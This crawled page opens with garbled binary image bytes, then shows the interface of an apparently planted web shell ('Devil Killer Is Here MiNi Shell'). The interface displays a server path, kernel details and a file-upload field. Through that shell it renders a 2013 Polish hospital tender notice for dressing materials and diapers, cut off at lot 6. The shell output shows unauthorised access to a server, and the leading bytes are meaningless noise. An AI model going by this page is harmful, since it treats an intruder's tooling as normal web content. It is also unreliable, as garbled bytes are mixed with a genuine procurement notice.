JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131128/488556-N-2013.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa materiałów opatrunkowych i pieluchomajtek</b><br>
<b>Numer ogłoszenia: 488556 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych i pieluchomajtek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów opatrunkowych określonych w pakietach nr 1- 18 (wata, lignina, gaza, kompresy, przylepce, opaski elastyczne, opatrunki specjalistyczne, opaski gipsowe oraz środków do pielęgnacji pacjenta, pieluchomajtki itp.) określonych w poszczególnych pakietach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.19.80.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
2.W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, Zamawiający wymaga, aby wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje dwie główne dostawy, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączenie dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a)  dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a)  dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a)  sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dopuszczające do obrotu i stosowania na terenie Polski zgodnie z ustawą o wyrobach medycznych.
Odnośnie wyrobów, do których nie mają zastosowania przepisy ustawy o Wyrobach Medycznych - odpowiednie dokumenty dopuszczające oferowane produkty do obrotu.
Odnośnie wyrobów chirurgicznych inwazyjnych typu: kompresy gazowe, serwety operacyjne- świadectwo potwierdzające ich rejestrację jako wyrobów Kl.2A reguła 7.
Odnośnie pieluchomajtek dla noworodków - opinia Instytutu Matki i Dziecka  i atest PZH.
Odnośnie opasek gipsowych- Karta Danych Technicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 20</li>
<li>3 - Koszt kredytowania - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b) sposobu konfekcjonowania
c) liczby opakowań
d) wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta
    przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie
    gorszych od  produktu objętego umową i w cenie umownej.
    g) zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
        przypadku zmianie ulegnie kwota podatku VAT i cena brutto, cena netto
        pozostanie niezmienna, w przypadku zmiany stawki podatku VAT w ramach
        niniejszej umowy zmiana stawki następuje z dniem wejścia w życie aktu
        prawnego zmieniającego stawkę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Zespołu Opieki Zdrowotnej, ul. Szpitalna 22, 34-200 Sucha Beskidzka, Blok B, IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 10:00, miejsce: Sekretariat Zespołu opieki Zdrowotnej w suchej Beskidzkiej, Blok C, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są :
Pianka do oczyszczania skóry z kreatyną 400 ml szt.	250
Mydło w płynie z dodatkiem panthenolu o właściwościach czyszczących 500 ml szt. 	30
Krem ochronny do skóry z kreatyną 200 ml szt.	30
Olejek ochronny do skóry w aerozolu z panthenolem 200 ml szt.	10
Wilgotne chusteczki pielęgnacyjne 20x30 cm x 50 szt., op.	120
Płyn do masażu skóry z panthenolem 500 ml szt.	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Folia operacyjna 40-45cm x 28-30 cm 	150
Folia operacyjna 15-20cm x 28-30 cm 	30
Folia operacyjna 30cm x 28 cm 	30
Folia operacyjna 40-42 cmx42-45 cm	250 
Folia operacyjna 45cm x 55 cm 	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Opaska gipsowa 4-5 min. 2m x 6cm a2 szt., szt	100
Opaska gipsowa 4-5 min. 3m x 10cm a2 szt.,szt	600
Opaska gipsowa 4-5 min. 3m x 12cm a2 szt., szt	2 500
Opaska gipsowa 4-5 min. 3m x 14cm a2 szt., szt	8 500
Opaska wyścielająca podgipsowa 3m x 10cm	2 400
Opaska wyścielająca podgipsowa 3m x 15cm	2 600
Opaska wyścielająca podgipsowa 3m x 25cm	200
Opaska wyścielająca podgipsowa 3m x 6 cm	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Opaska dziana wiskozowa 4m x 10cm szt. w op. jednostkowych	14 000
Opaska dziana wiskozowa 4m x 15cm szt. w op. jednostkowych	14 000
Opaska dziana wiskozowa 4m x 5cm szt. w op. jednostkowych	2 500
Opaska elastyczna z zapinką 4m x 15cm szt. w op. jednostkowych	4 000
Opaska elastyczna z zapinką 4m x 12cm szt. w op. jednostkowych	1 500
Opaska elastyczna dziana podtrzymująca 6cm x 4m	2 000
Opaska elastyczna dziana podtrzymująca 8cm x 4m	2 000
Opaska elastyczna dziana podtrzymująca 10cm x 4m	2 000
Opaska elastyczna dziana podtrzymująca 12cm x 4m	5 000
Elastyczna siatka opatrunkowa (głowa), w metrach	300
Elastyczna siatka opatrunkowa (tułów), w metrach	200
Elastyczna siatka opatrunkowa (b. duży tułów), w metrach	200
Opaska kohezyjna o rozciągliwości 85% 8cm x 20m	10
Opaska kohezyjna o rozciągliwości 85% 10cm x 20m	15
Opaska kohezyjna o rozciągliwości 85% 12cm x 20m	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Plaster do łączenia ran 3 x 75-76 mm 	1 000
Plaster do łączenia ran 6 x 75-76 mm 	750
Plaster hypoalergiczny szer. 10 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	500
Plaster hypoalergiczny szer. 15 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	250
Plaster hypoalergiczny szer. 20 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	75
Plaster hypoalergiczny szer. 30 cm x 10 m szt.
z klejem akrylowym lub kauczukowym	10
Plaster na jedwabiu  m. x  2,5 cm rolka pakowana pojedynczo, o dł. 9,1-9,2 m szt	1 000
Plaster na jedwabiu  m. x  5 cm rolka pakowana pojedynczo, o dł. 9,1-9,2 m , szt.	1 200
Plaster na włókninie m. x  2,5 cm rolka pakowana pojedynczo, o dł. 9,1-9,2 m, szt	50
Plaster na włókninie m. x  5 cm rolka pakowana pojedynczo, o dł. 9,1-9,2 m, szt.	50
Plaster na folii  m. x  5 cm rolka pakowana pojedynczo, o dł. 9,1-9,2 m, szt.	500
Plaster z opatrunkiem poiniekcyjny 38-40 x 10-16 mm x szt	13 000
Plaster z opatrunkiem min. 57 mm x 16 mm szt.	600
Plaster wodoodporny z opatrunkiem różne rozmiary 
(rozmiar max. ok. 4x6 cm) szt	2 500
Opatrunek włókninowy pod wenflony z poduszeczką wyścielającą w rozm. 6x8cm a 50 szt	600
Plaster z opatrunkiem 8 cm na tkaninie bawełnianej lub wiskozowej m.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 20</li>
<li>3. Koszt kredytowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
Opatrunek pooperacyjny włókninowy jałowy 7-7,2 cm x 5 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 10 cm x 6 cm szt	1 500
Opatrunek pooperacyjny włókninowy jałowy 15 cm x 6-10 cm szt	600
Opatrunek pooperacyjny włókninowy jałowy 10 cm x 8-10 cm szt	2 000
Opatrunek pooperacyjny włókninowy jałowy 20 cm x 8-10 cm szt	1 000
Opatrunek pooperacyjny włókninowy jałowy 25 cm x 10 cm szt	300
Opatrunek pooperacyjny włókninowy jałowy 35 cm x 10 cm szt	1 000.</p></li>
